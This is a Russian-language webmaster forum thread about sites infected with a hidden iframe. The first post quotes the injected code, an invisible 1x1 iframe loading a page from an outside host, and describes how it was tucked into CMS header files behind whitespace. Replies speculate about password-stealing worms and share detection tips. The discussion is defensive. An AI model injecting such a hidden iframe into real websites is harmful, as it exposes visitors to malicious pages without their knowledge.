- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
<iframe src="http:[ // ]xbr.ru/images/old/index.php" width="1" height="1" style="visibility: hidden;"></iframe>
Вот такую хрень подсадили на несколько сайтов. Внедрено в код настолько грамотно, что у меня глубокие сомнения автоматической работы червя. В wordpress был найден файл, формирующий хидеры и найдена точка, в которой фрейм гарантировано окажется перед объявлением типа документа. Перед echo было поставлено куча пробелов, чтобы при пролистывании кода видно не было. Между echo и фреймом - тоже.
То же самое было проделано с IPB и Joomla, способы те же, но движки то разные совсем ! И на html-сайте видел... Сервера - разные. Либо перехват пароля сниффером (пароли недешифруемые), либо пароли утянуты из TotalCommander =)
Но вроде люди говорят, что червяк, отточеный ещё на валуехосте. Хотя ХЗ.
Короче, советую поискать в выдаваемом коде своих сайтов слово "xbr" - мало ли не один я поймал.
Zhilinsky, давно уже промышляют подобным....
В ЖЖ сказали, что всё-таки червь, тырит пароли где находит. Умнеют, гады...
Короче, советую поискать в выдаваемом коде своих сайтов слово "xbr" - мало ли не один я поймал.
этот троян перестраивается каждым "иннициатором" под свой сайт. потому лучше проверять на наличие "iframe"
В ЖЖ сказали, что всё-таки червь, тырит пароли где находит. Умнеют, гады..
Есть тема что они их у хостинг компаний забирают... точнее забираются через дырку в хостинге.
Не, я раскапываю свой случай - скорее всего заражена сеть на работе - только оттуда можно было ко всем сайтам пароли выцепить. Да и хостинги совсем разные, в том числе один собственный, на котором всего два сайта висит.
Завтра буду там всё антивирями вдоль и поперёк прочёсывать - споймаю тварь =)
NOD ничего не нашёл, гадина...
Этот червь касперским хорошо ловиться.
Народ, чё скажу - офигеете. Знаете кто червяка принёс ? ООО "Продвижение", будь оно неладно, и они это подтвердили :-)